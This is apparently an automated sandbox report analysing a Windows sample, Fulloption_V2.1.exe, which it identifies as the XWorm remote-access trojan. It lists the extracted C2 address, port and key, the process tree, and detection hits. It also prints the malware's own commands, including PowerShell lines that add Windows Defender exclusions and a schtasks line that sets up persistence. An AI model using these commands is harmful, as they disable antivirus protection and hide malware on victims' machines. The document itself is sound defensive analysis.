Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Fulloption_V2.1.exe

Overview

General Information

Sample name:Fulloption_V2.1.exe
Analysis ID:1559237
MD5:9f53cc8bc6cb459cb3c5ccc0d54812d6
SHA1:f18cda32845d3daecf694457a92f614931695c50
SHA256:aa1a013b0b9dba1edcac0096c8bd847cf50126cc719e5ec8e1d7311ef37b97f8
Tags:exeuser-Slimzick
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • Fulloption_V2.1.exe (PID: 2012 cmdline: "C:\Users\user\Desktop\Fulloption_V2.1.exe" MD5: 9F53CC8BC6CB459CB3C5CCC0D54812D6)
    • FullOption_2.1Xenos.exe (PID: 416 cmdline: "C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe" MD5: 2F6E9C0DD1C6859A9D6E7ACEA1DB9AC0)
    • svchost.exe (PID: 4000 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 12B722899C9A6B517D52B8DE2C7C3E2E)
      • powershell.exe (PID: 4816 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1060 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4824 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1220 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 4632 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 6292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 5712 cmdline: C:\ProgramData\svchost.exe MD5: 12B722899C9A6B517D52B8DE2C7C3E2E)
  • svchost.exe (PID: 5648 cmdline: C:\ProgramData\svchost.exe MD5: 12B722899C9A6B517D52B8DE2C7C3E2E)
  • cleanup
{"C2 url": ["45.141.27.248"], "Port": 7777, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\svchost.exeJoeSecurity_XWormYara detected XWormJoe Security
    C:\ProgramData\svchost.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\ProgramData\svchost.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xe0b6:$s6: VirtualBox
      • 0xe014:$s8: Win32_ComputerSystem
      • 0x1073c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x107d9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x108ee:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xf982:$cnc4: POST / HTTP/1.1
      C:\Users\user\AppData\Roaming\svchost.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\AppData\Roaming\svchost.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          Click to see the 2 entries
          SourceRuleDescriptionAuthorStrings
          00000002.00000000.2149098147.00007FF6AE88B000.00000008.00000001.01000000.00000006.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            00000002.00000002.3390144437.00007FF6AE88C000.00000008.00000001.01000000.00000006.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              00000003.00000000.2150604993.0000000000E72000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                00000003.00000000.2150604993.0000000000E72000.00000002.00000001.01000000.00000007.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0xdeb6:$s6: VirtualBox
                • 0xde14:$s8: Win32_ComputerSystem
                • 0x1053c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0x105d9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0x106ee:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0xf782:$cnc4: POST / HTTP/1.1
                00000000.00000002.2151998153.0000000003251000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                  Click to see the 7 entries
                  SourceRuleDescriptionAuthorStrings
                  3.0.svchost.exe.e70000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                    3.0.svchost.exe.e70000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                      3.0.svchost.exe.e70000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                      • 0xe0b6:$s6: VirtualBox
                      • 0xe014:$s8: Win32_ComputerSystem
                      • 0x1073c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      • 0x107d9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                      • 0x108ee:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                      • 0xf982:$cnc4: POST / HTTP/1.1
                      0.2.Fulloption_V2.1.exe.3276bd8.2.unpackJoeSecurity_XWormYara detected XWormJoe Security
                        0.2.Fulloption_V2.1.exe.3276bd8.2.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                        • 0xc2b6:$s6: VirtualBox
                        • 0xc214:$s8: Win32_ComputerSystem
                        • 0xe93c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                        • 0xe9d9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                        • 0xeaee:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                        • 0xdb82:$cnc4: POST / HTTP/1.1
                        Click to see the 15 entries

                        System Summary

                        barindex
                        Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Fulloption_V2.1.exe, ProcessId: 2012, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe
                        Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 45.141.27.248, DestinationIsIpv6: false, DestinationPort: 7777, EventID: 3, Image: C:\Users\user\AppData\Roaming\svchost.exe, Initiated: true, ProcessId: 4000, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49986
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 4000, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 4816, ProcessName: powershell.exe
                        Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: C:\ProgramData\svchost.exe, CommandLine: C:\ProgramData\svchost.exe, CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\ProgramData\svchost.exe, ProcessId: 5712, ProcessName: svchost.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Fulloption_V2.1.exe", ParentImage: C:\Users\user\Desktop\Fulloption_V2.1.exe, ParentProcessId: 2012, ParentProcessName: Fulloption_V2.1.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 4000, ProcessName: svchost.exe
                        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 4000, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 4816, ProcessName: powershell.exe
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 4000, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 4000, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 4816, ProcessName: powershell.exe
                        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 4000, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 4000, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe", ProcessId: 4632, ProcessName: schtasks.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Fulloption_V2.1.exe", ParentImage: C:\Users\user\Desktop\Fulloption_V2.1.exe, ParentProcessId: 2012, ParentProcessName: Fulloption_V2.1.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 4000, ProcessName: svchost.exe
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 4000, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 4816, ProcessName: powershell.exe
                        Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Fulloption_V2.1.exe", ParentImage: C:\Users\user\Desktop\Fulloption_V2.1.exe, ParentProcessId: 2012, ParentProcessName: Fulloption_V2.1.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 4000, ProcessName: svchost.exe

                        Persistence and Installation Behavior

                        barindex
                        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 4000, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe", ProcessId: 4632, ProcessName: schtasks.exe
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-20T10:38:26.386907+010028528701Malware Command and Control Activity Detected45.141.27.2487777192.168.2.649986TCP
                        2024-11-20T10:38:30.152640+010028528701Malware Command and Control Activity Detected45.141.27.2487777192.168.2.649986TCP
                        2024-11-20T10:38:38.929759+010028528701Malware Command and Control Activity Detected45.141.27.2487777192.168.2.649986TCP
                        2024-11-20T10:38:51.230589+010028528701Malware Command and Control Activity Detected45.141.27.2487777192.168.2.649986TCP
                        2024-11-20T10:39:00.150444+010028528701Malware Command and Control Activity Detected45.141.27.2487777192.168.2.649986TCP
                        2024-11-20T10:39:03.593725+010028528701Malware Command and Control Activity Detected45.141.27.2487777192.168.2.649986TCP
                        2024-11-20T10:39:14.007694+010028528701Malware Command and Control Activity Detected45.141.27.2487777192.168.2.649986TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-20T10:38:26.607517+010028529231Malware Command and Control Activity Detected192.168.2.64998645.141.27.2487777TCP
                        2024-11-20T10:38:38.931580+010028529231Malware Command and Control Activity Detected192.168.2.64998645.141.27.2487777TCP
                        2024-11-20T10:38:51.232720+010028529231Malware Command and Control Activity Detected192.168.2.64998645.141.27.2487777TCP
                        2024-11-20T10:39:03.595756+010028529231Malware Command and Control Activity Detected192.168.2.64998645.141.27.2487777TCP
                        2024-11-20T10:39:14.008600+010028529231Malware Command and Control Activity Detected192.168.2.64998645.141.27.2487777TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-20T10:38:30.152640+010028528741Malware Command and Control Activity Detected45.141.27.2487777192.168.2.649986TCP
                        2024-11-20T10:39:00.150444+010028528741Malware Command and Control Activity Detected45.141.27.2487777192.168.2.649986TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: Fulloption_V2.1.exeAvira: detected
                        Source: C:\ProgramData\svchost.exeAvira: detection malicious, Label: TR/Spy.Gen
                        Source: C:\Users\user\AppData\Roaming\svchost.exeAvira: detection malicious, Label: TR/Spy.Gen
                        Source: 00000000.00000002.2151998153.0000000003251000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["45.141.27.248"], "Port": 7777, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                        Source: C:\ProgramData\svchost.exeReversingLabs: Detection: 84%
                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeReversingLabs: Detection: 68%
                        Source: C:\Users\user\AppData\Roaming\svchost.exeReversingLabs: Detection: 84%
                        Source: Fulloption_V2.1.exeReversingLabs: Detection: 63%
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: C:\ProgramData\svchost.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Roaming\svchost.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exeJoe Sandbox ML: detected
                        Source: Fulloption_V2.1.exeJoe Sandbox ML: detected
                        Source: 3.2.svchost.exe.336f760.0.raw.unpackString decryptor: 45.141.27.248
                        Source: 3.2.svchost.exe.336f760.0.raw.unpackString decryptor: 7777
                        Source: 3.2.svchost.exe.336f760.0.raw.unpackString decryptor: <123456789>
                        Source: 3.2.svchost.exe.336f760.0.raw.unpackString decryptor: <Xwormmm>
                        Source: 3.2.svchost.exe.336f760.0.raw.unpackString decryptor: XWorm V5.6
                        Source: 3.2.svchost.exe.336f760.0.raw.unpackString decryptor: USB.exe
                        Source: 3.2.svchost.exe.336f760.0.raw.unpackString decryptor: %ProgramData%
                        Source: 3.2.svchost.exe.336f760.0.raw.unpackString decryptor: svchost.exe
                        Source: FullOption_2.1Xenos.exe, 00000002.00000000.2149053166.00007FF6AE833000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_068d70b1-5
                        Source: Fulloption_V2.1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: Fulloption_V2.1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: Bet\SBAGGY2\SBAGGY\examples\example_win32_directx11\Build\example_win32_directx11.pdb source: FullOption_2.1Xenos.exe, 00000002.00000000.2149053166.00007FF6AE833000.00000002.00000001.01000000.00000006.sdmp, FullOption_2.1Xenos.exe, 00000002.00000002.3389987215.00007FF6AE834000.00000002.00000001.01000000.00000006.sdmp, FullOption_2.1Xenos.exe.0.dr

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 45.141.27.248:7777 -> 192.168.2.6:49986
                        Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:49986 -> 45.141.27.248:7777
                        Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 45.141.27.248:7777 -> 192.168.2.6:49986
                        Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 45.141.27.248 7777Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 208.95.112.1 80Jump to behavior
                        Source: Malware configuration extractorURLs: 45.141.27.248
                        Source: Yara matchFile source: 3.0.svchost.exe.e70000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Fulloption_V2.1.exe.3289218.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Fulloption_V2.1.exe.3276bd8.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.svchost.exe.336f760.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: C:\ProgramData\svchost.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                        Source: global trafficTCP traffic: 192.168.2.6:49986 -> 45.141.27.248:7777
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                        Source: Joe Sandbox ViewASN Name: SPECTRAIPSpectraIPBVNL SPECTRAIPSpectraIPBVNL
                        Source: unknownDNS query: name: ip-api.com
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.141.27.248
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: ip-api.com
                        Source: powershell.exe, 00000007.00000002.2363039514.000001F842646000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                        Source: powershell.exe, 0000000C.00000002.2525536547.00000172FD688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                        Source: powershell.exe, 0000000F.00000002.2715651701.00000164EE6AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
